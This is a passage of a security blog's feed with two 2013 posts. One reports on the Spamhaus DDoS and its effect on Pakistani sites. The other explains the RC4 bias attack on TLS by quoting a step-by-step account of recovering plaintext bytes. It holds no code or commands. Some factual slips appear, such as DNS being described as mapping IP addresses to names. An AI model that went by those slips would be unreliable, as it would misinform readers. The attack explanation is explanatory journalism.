   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:10.0pt;
 mso-para-margin-left:0in;
 line-height:115%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:"Times New Roman";
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;br /&gt;
Recently, the largest DDOS attack in the history of the internet has been
noticed, According to the reports from various websites; the attack was of more
than 300GB/second. It all started when &lt;b&gt;Spamhaus(NON PROFIT ORGAZNIATION) &lt;/b&gt;that
manages the spam filters for various websites blacklisted a &lt;b&gt;Dutch&lt;/b&gt; based
webhosting company &lt;b&gt;Cyberbunker&lt;/b&gt;, &lt;b&gt;Cyberbunker&lt;/b&gt; allows a user to host everything
else than Child pornography and stuff related to terrorism. This allows an
attacker to host any malicious software such as botnet. A botnet can be used
for variety of purposes ranging from stealing credit card information,
infecting PC's to even denial of service attacks. &lt;br /&gt;
In a interview with bbc, Spamhaus blamed the Cyberbunker for the ongoing
attacks, they said that Cyberbunkers have joined hands with attackers to
perform DDOS attacks in order to compromise the availability.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
The attack was a Denial of service attacks, which is often used by attackers
to compromise the availability of the website by flooding the website with huge
number of packets (In most cases), The DDOS attack was aimed at the DNS servers
of &lt;b style="mso-bidi-font-weight: normal;"&gt;Spamhaus&lt;/b&gt;, A DNS server is
responsible for the translation of an IP address to domain name, In simple
words, When we are accessing any website on the internet, on the back end we
are actually accessing the IP address, DNS simplifies the process.&lt;br /&gt;
&lt;br /&gt;
The experts call the attack as the biggest DDOS attack in the history of the
internet, Normally, when we talk about a massive DDOS attack against huge
infrastructures, It ranges from &lt;br /&gt;
30 to 50 GB per second of traffic, however this attack was more than 300gbps
per traffic. The company moved to &lt;b style="mso-bidi-font-weight: normal;"&gt;Cloudfare&lt;/b&gt;
(A web performance and security company) in order to protect their services
from been taken down, Initially they were receiving 10GBPS of traffic, but it
got even the worse the attack and the highest peak noted was around 300GBPS.
However, instead of going after Spamhaus the attackers targeted Cloudfare
itself, the attackers failed to knock Cloudfare servers, even after a 100GIGS
of traffic, after that they targeted the bandwidth providers of Cloudfare known
as "Tier2", who itself buy bandwidth from
Tier1 provider. The major traffic load was carried out by Tier1, which reported
more than 300GBPS of traffic, making it the largest DDOS attack ever.&lt;br /&gt;
&lt;br /&gt;
Now, one might think that, how is it slowing down the internet?, it's
because, this is how the internet works as internet is simply a collection of
networks, Let's say, when we are connecting to google.com from Pakistan, our
browser sends a http requests, the browser sends/receives a packets which are
hopped across lots of routers/networks in between until they reach the Google
servers. As mentioned previously Tier2 buys bandwidth from Tier1, Tier1
connects to other Tier1 providers to ensure that all the networks are connected
with each other.Tier1 providers are the core of the internet, the Tier1 provider
ended up suffering all the traffic. It is reported by Cloudfare that Tier1
providers for Europe were affected, as a reason of which, internet slowdown was
noticed for people surfing the internet in those areas. However, In Pakistan,
the severity was very low, therefore major slow down was not noticed.&lt;br /&gt;
&lt;br /&gt;
Lots of Pakistani&amp;nbsp;websites&amp;nbsp;are hosted abroad, the following is the list of
them:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;www.pakistan.gov.pk&lt;/b&gt;
(Main Pakistan Government Portal)&lt;br /&gt;
&lt;b&gt;www.infopak.gov.pk&lt;/b&gt;
(Ministry of Information and Broadcasting)&lt;br /&gt;
&lt;b&gt;www.interior.gov.pk&lt;/b&gt;
(Ministry of Interior)&lt;br /&gt;
&lt;b&gt;www.e-government.gov.pk&lt;/b&gt;
(E Government Directorate)&lt;br /&gt;
&lt;b&gt;www.pta.gov.pk&lt;/b&gt;
(Pakistan Telecom Authority)&lt;br /&gt;
&lt;b&gt;www.pc.gov.pk&lt;/b&gt;
(Planning Commission)&lt;br /&gt;
&lt;b&gt;www.sindh.gov.pk&lt;/b&gt;
(Government of Sindh)&lt;br /&gt;
&lt;br /&gt;
As as result of the outage they are suffering the outage and lots of
Pakistani users are not able to access the websites, If we host these servers
in Pakistan, Initially the attack would be mitigated, however it would raise a
lot of security concerns, Since Pakistani servers would be more easy for
attackers to compromise and knock them off, due to poor security and patch
management. Also, I don't see any of the protection against DOS attacks; perhaps
if they could acquire &lt;b&gt;Cloudfare &lt;/b&gt;protection services, the DOS attacks would be
mitigated easily.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/4pfJ22G-4SA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4189183736098328426/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/anotomy-of-largest-ddos-attack-that.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4189183736098328426?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4189183736098328426?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/4pfJ22G-4SA/anotomy-of-largest-ddos-attack-that.html" title="Anotomy of The Largest DDOS Attack That Almost Took Down The Internet" /><author><name>Shaharyar Shafiq</name><uri>https://plus.google.com/113862218722503273440</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/--k2pi9XiHU0/AAAAAAAAAAI/AAAAAAAAAHI/Kl1wAcIBxS4/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s72-c/DOS.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/anotomy-of-largest-ddos-attack-that.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4HRX0_eCp7ImA9WhBXGUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7623453640963117943</id><published>2013-04-01T05:49:00.000-07:00</published><updated>2013-04-03T06:48:54.340-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-03T06:48:54.340-07:00</app:edited><title>HTTPS Cracked! SSL/TLS Attacked And Exploited</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s1600/https.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="441" src="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s640/https.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;People who blog about ethical hacking have a very sincere relationship with Cryptographers. They (the Cryptographers) keep bringing in something delightful into the everyday nonsense and we blabber about their accomplishments until its squishy and old - this love goes far beyond then can be comprehended by normal folk. No offence.&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-family: inherit;"&gt;It seems like they have swept us off our feet again and this time around, they are flaunting the big guns. &lt;/span&gt;&lt;b style="font-family: inherit;"&gt;&lt;a href="http://www.isg.rhul.ac.uk/tls/" rel="nofollow" target="_blank"&gt;Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS.&lt;/a&gt;&lt;/b&gt;&lt;span style="font-family: inherit;"&gt; Transport Layer Security didn't face a major blow during the attack as it requires to capture millions and billions of connections consisting of the same plaintext. But this highlights a major issue present in using the RC4 encryption algorithm.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption which makes it lag therefore it uses a hybrid approach. TLS connection can be setup using public/private key pairs and once established can share encrypted data over a secure network that uses ciphers for encrypting data such as AES, DES, Triple-DES, Blowfish, RC4, etc.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;/span&gt;

&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;a href="http://3.bp.blogspot.com/-TYgCbSxqIu8/UVcc1HWzRlI/AAAAAAAABDM/3l6Kiqu8vIE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://3.bp.blogspot.com/-TYgCbSxqIu8/UVcc1HWzRlI/AAAAAAAABDM/3l6Kiqu8vIE/s640/1.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;RC4 has been advised against many times in the past but its also a fact that it brings in half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan-Bernstein-Paterson-Poettering-Schuldt (AIFBPPS).&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;&lt;a href="http://nakedsecurity.sophos.com/2013/03/16/has-https-finally-been-cracked/" rel="nofollow" target="_blank"&gt;According to NakedSophos team;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;RC4 is a&amp;nbsp;&lt;em style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;stream cipher&lt;/em&gt;, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;k XOR k = 0&lt;/tt&gt;, and because&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;p XOR 0 = p&lt;/tt&gt;.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="background-color: white; border: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; margin-bottom: 10px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;RC4 generates a statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should; 256 keys on average to be precise with a probability of 1/128. This resulted in WEP being attacked which was then replaced by WPA.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-t7SpNIHnwlQ/UVcc1p2zW3I/AAAAAAAABDY/X9Js-XPygoc/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="102" src="http://1.bp.blogspot.com/-t7SpNIHnwlQ/UVcc1p2zW3I/AAAAAAAABDY/X9Js-XPygoc/s640/2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;AIFBPPS have taken this attack further than anyone else &lt;i&gt;"producing statistical tables for the probability of every output byte (0.255&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;) &lt;/span&gt;&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements."&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="background-color: white; border: 0px; color: #333333; margin-bottom: 10px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;&lt;a href="http://nakedsecurity.sophos.com/2013/03/16/has-https-finally-been-cracked/" rel="nofollow" target="_blank"&gt;According to NakedSophos team;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-family: inherit;"&gt;By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way.&lt;br /&gt;The probability tables for a few of the output positions (which are numbered from 1 to 256) are show below.&lt;br /&gt;The authors realised that if you could produce TLS connections over and over again that contained the the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-_g2PWxDpAeQ/UVcc1YAyd1I/AAAAAAAABDU/yuhv8HN_064/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-_g2PWxDpAeQ/UVcc1YAyd1I/AAAAAAAABDU/yuhv8HN_064/s640/3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="color: black;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="color: black;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;b&gt;Here's a brief description of how it works by NakedSophos team:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;"Imagine that you know that the 48th plaintext byte, P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;, is always the same, but not what it is.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;You provoke millions of TLS connections containing that fixed-but-unknown P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;; in each connection, which will be using a randomly-chosen session key, P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;will end up encrypted with a pseudo-random cipher byte, K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;, to give a pseudo-random ciphertext byte, C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;And you sniff the network traffic so you capture millions of different samples of C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Now imagine that one value for C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;as C'.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;From the probability table for K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;takes the value 208 more than 1% too often.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;In other words, C' must be&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;P XOR 208&lt;/tt&gt;, so that P must be&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;C' XOR 208&lt;/tt&gt;, and you have recovered the 48th byte of plaintext.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.&lt;/span&gt;&lt;/div&gt;
